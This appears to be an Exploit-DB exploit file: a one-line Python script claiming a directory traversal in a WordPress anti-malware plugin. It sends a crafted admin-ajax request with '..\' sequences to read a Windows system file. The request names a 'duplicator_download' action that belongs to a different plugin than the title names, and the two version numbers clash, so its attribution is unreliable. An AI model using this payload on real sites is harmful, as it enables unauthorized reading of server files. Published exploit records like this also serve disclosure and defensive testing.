exploit-db-mirror/exploits/php/webapps/50107.py

# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal
# Date: 05.07.2021
# Exploit Author: TheSmuggler
# Vendor Homepage: https://gotmls.net/
# Software Link: https://gotmls.net/downloads/
# Version: <= 4.20.72
# Tested on: Windows

import requests

print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)